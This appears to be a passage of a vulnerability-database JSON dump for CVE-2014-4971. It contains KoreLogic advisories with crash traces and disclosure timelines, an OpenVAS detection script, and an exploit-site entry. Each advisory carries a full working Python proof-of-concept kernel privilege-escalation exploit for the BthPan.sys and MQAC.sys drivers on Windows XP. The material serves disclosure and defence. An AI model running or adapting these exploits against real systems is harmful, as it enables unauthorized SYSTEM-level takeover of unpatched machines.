Could not open handle to BthPan\" \nexit(1) \nNtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) \nbuf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400 \nWriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0))) \nWriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) \nkBase,kVer = getBase() \nhKernel = LoadLibraryExA(kVer,0,1) \nHalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\") \nHalDispatchTable -= hKernel \nHalDispatchTable += kBase \nHalDispatchTable += 0x4 \nDeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0) \nCloseHandle(handle) \nNtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) \nexit(0) \n \nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc. \nand are licensed under a Creative Commons Attribution Share-Alike 4.0 \n(United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a proven \ntrack record of providing security services to entities ranging from \nFortune 500 to small and mid-sized companies. We are a highly skilled \nteam of senior security consultants doing by-hand security assessments \nfor the most important networks in the U.S. and around the world. We \nare also developers of various tools and resources aimed at helping \nthe security community. 
\nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127535/KL-001-2014-002.txt"}], "korelogic": [{"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-002\nPublication Date: 2014-07-18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: Bluetooth Personal Area Networking\n Affected Versions: 5.1.2600.5512\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the BthPan module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the BthPan device\n and subsequently make DeviceIoControlFile() calls into that\n device. During the IRP handler routine for 0x0012b814 the user\n provided OutputBuffer address is not validated. This allows an\n attacker to specify an arbitrary address and write\n (or overwrite) the memory residing at the specified address.\n This is classicaly known as a write-what-where vulnerability and\n has well known exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. 
In our fuzzing\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\n call is 0xffff0000.\n\nSTACK_TEXT:\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\nWARNING: Stack unwind information not available. Following frames may be wrong.\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the bthpan driver.\n\nFOLLOWUP_IP:\nbthpan!BthpanReqAdd+16b\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. 
InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\nErrCode = 00000002\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\nnt!IopCompleteRequest+0x92:\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in BthPan it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. 
Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have not\n been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\n passed since vendor acknowledgement of the initial\n report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\n does not impact any \"up-platform\" products. Says they\n are investigating embedded platforms. Does not provide\n CVE number.\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\n the report of this vulnerability with another and that\n they cannot reproduce the described behavior.\n Microsoft asks for an updated Proof-of-Concept, crash\n dumps or any further analysis of the vulnerability\n that KoreLogic can provide.\n 2014.06.25 - KoreLogic provides Microsoft with an updated\n Proof-of-Concept which demonstrates using the\n vulnerability to spawn a system shell.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. 
Also requests that a CVE\n ID be issued for this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\n identical to KL-001-2014-003 and issues CVE-2014-4971\n for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack) \n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n \n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n \n handle = 
CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n if (handle == INVALID_HANDLE_VALUE):\n\tprint \"[!] Could not open handle to BthPan\"\n\texit(1)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)", "modified": "2014-07-18T00:00:00", "published": "2014-07-18T00:00:00", "href": "https://korelogic.com/Resources/Advisories/KL-001-2014-002.txt", "id": "KL-001-2014-002", "type": "korelogic", "title": "Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-003\nPublication Date: 2014.07.18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: MQ Access Control\n Affected Versions: 5.1.0.1110\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. 
Vulnerability Description\n\n A vulnerability within the MQAC module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the MQAC device and\n subsequently make DeviceIoControlFile() calls into that device.\n During the IRP handler routine for 0x1965020f the user provided\n OutputBuffer address is not validated. This allows an attacker\n to specify an arbitrary address and write (or overwrite) the\n memory residing at the specified address. This is classically\n known as a write-what-where vulnerability and has well known\n exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our\n fuzzing testcase, the specified OutputBuffer in the\n DeviceIoControlFile() call is 0xffff0000.\n\nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the mqac driver.\n\nOLLOWUP_IP: \nmqac!AC2QM+5d\nb230af37 891e mov dword ptr [esi],ebx\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. 
InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\nErrCode = 00000002\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\nmqac!AC2QM+0x5d:\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in MQAC it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. 
Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have\n not been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\n have passed since vendor acknowledgement of the\n initial report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft responds to KoreLogic that the\n vulnerability does not affect an \"up-platform\"\n product. Says they are investigating embedded\n platforms. Does not provide a CVE number or a\n disclosure date.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that\n a CVE ID be issued to this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\n be identical to KL-001-2014-002 and issues\n CVE-2014-4971 for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. 
Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack)\n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n\n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\n #Overwrite 
Pointer\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\n print \"[+] HalDispatchTable+0x4 overwritten\"\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)", "modified": "2014-07-18T00:00:00", "published": "2014-07-18T00:00:00", "href": "https://korelogic.com/Resources/Advisories/KL-001-2014-003.txt", "id": "KL-001-2014-003", "title": "Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation", "type": "korelogic", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:52:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4971"], "description": "This host is missing an important security\n update according to Microsoft Bulletin MS14-062.", "modified": "2020-06-09T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310804492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804492", "type": "openvas", "title": "Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed 
in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804492\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-4971\");\n script_bugtraq_id(68764);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 08:38:41 +0530 (Wed, 15 Oct 2014)\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Microsoft Windows Message Queuing Service Privilege Escalation Vulnerability (2993254)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft Bulletin MS14-062.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error when handling\n objects within the Message Queuing service, which can be exploited to elevate\n privileges by sending a specially crafted IOCTL request.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow\n local users to gain escalated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS14-062\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwin32SysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Mqac.sys\");\nif(!win32SysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3, win2003x64:3) > 0)\n{\n if(version_is_less(version:win32SysVer, test_version:\"5.2.2008.5417\")){\n report = report_fixed_ver(installed_version:win32SysVer, fixed_version:\"5.2.2008.5417\", install_path:sysPath);\n security_message(port:0, data:report);\n }\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-02T05:26:05", "description": "Exploit for windows platform in category local exploits", "edition": 2, "published": "2014-07-22T00:00:00", "type": "zdt", "title": "Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-22T00:00:00", "id": "1337DAY-ID-22462", "href": "https://0day.today/exploit/description/22462", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\nPublication Date: 2014.07.18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\r\n \r\n \r\n1. 
Vulnerability Details\r\n \r\n Affected Vendor: Microsoft\r\n Affected Product: MQ Access Control\r\n Affected Versions: 5.1.0.1110\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n \r\n2. Vulnerability Description\r\n \r\n A vulnerability within the MQAC module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n \r\n3. Technical Description\r\n \r\n A userland process can create a handle into the MQAC device and\r\n subsequently make DeviceIoControlFile() calls into that device.\r\n During the IRP handler routine for 0x1965020f the user provided\r\n OutputBuffer address is not validated. This allows an attacker\r\n to specify an arbitrary address and write (or overwrite) the\r\n memory residing at the specified address. This is classically\r\n known as a write-what-where vulnerability and has well known\r\n exploitation methods associated with it.\r\n \r\n A stack trace from our fuzzing can be seen below. 
In our\r\n fuzzing testcase, the specified OutputBuffer in the\r\n DeviceIoControlFile() call is 0xffff0000.\r\n \r\nSTACK_TEXT: \r\nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\r\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\r\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\r\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\r\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n \r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the mqac driver.\r\n \r\nOLLOWUP_IP:\r\nmqac!AC2QM+5d\r\nb230af37 891e mov dword ptr [esi],ebx\r\n \r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n \r\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\r\nErrCode = 00000002\r\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\r\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n \r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. 
To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n \r\n4. Mitigation and Remediation Recommendation\r\n \r\n None. A patch is not likely to be forthcoming from the vendor.\r\n \r\n5. Credit\r\n \r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n \r\n6. Disclosure Timeline\r\n \r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the 